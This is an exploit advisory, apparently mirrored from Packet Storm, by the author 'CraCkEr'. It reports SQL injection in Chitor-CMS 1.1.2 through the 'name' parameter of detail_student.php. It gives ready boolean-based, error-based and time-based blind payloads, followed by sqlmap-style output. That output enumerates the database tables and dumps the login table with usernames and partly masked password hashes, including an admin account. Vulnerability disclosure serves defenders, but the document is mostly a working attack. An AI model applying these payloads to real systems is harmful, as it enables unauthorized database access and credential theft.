## https://sploitus.com/exploit?id=PACKETSTORM:171974
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Vulnerability ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : https://github.com/waqaskanju/Chitor-CMS โ
โ Vendor : Waqas Ahmad โ
โ Software : Chitor-CMS 1.1.2 โ
โ Vuln Type: SQL Injection โ
โ Impact : Database Access โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ โ
โ SQL injection attacks can allow unauthorized access to sensitive data, modification of โ
โ data and crash the application or make it unavailable, leading to lost revenue and โ
โ damage to a company's reputation. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2023 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Path: /detail_student.php
/detail_student.php?name=[SQLI]&search=Search
GET parameter 'name' is vulnerable to SQLI
---
Parameter: name (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: name=123' AND 7885=7885#&search=Search
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search
---
GET parameter 'name' is vulnerable to SQLI
[+] Starting the Attack
fetching current database
current database: ''**********_chitor_db'
fetching tables for database: '**********_chitor_db'
Database: **********_chitor_db
[12 tables]
+-----------------+
| position |
| class_subjects |
| employees |
| login |
| marks |
| school_classes |
| schools |
| setting |
| students_info |
| subject_teacher |
| subjects |
| tab_index |
+-----------------+
fetching columns for table 'login' in database '**********_chitor_db'
Table: login
[5 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| Password | varchar(256) |
| Status | int(11) |
| Employee_Id | int(11) |
| Id | int(11) |
| User_Name | varchar(30) |
+-------------+--------------+
fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'
Table: login
[3 entries]
+----+----------+------------------------------------------+-------------+------------+
| Id | Status | Password | Employee_Id | User_Name |
+----+----------+------------------------------------------+-------------+------------+
| 1 | 1 | *****1a7fdd83dd1e2a309ce759***** (****) | 1 | Guest |
| 2 | 1 | *****82fb3cee50d9272ba79822***** | 2 | **qa*kan** |
| 3 | 1 | *****f297a57a5a743894a0e4a8***** (****) | 3 | admin |
+----+----------+------------------------------------------+-------------+------------+
[-] Done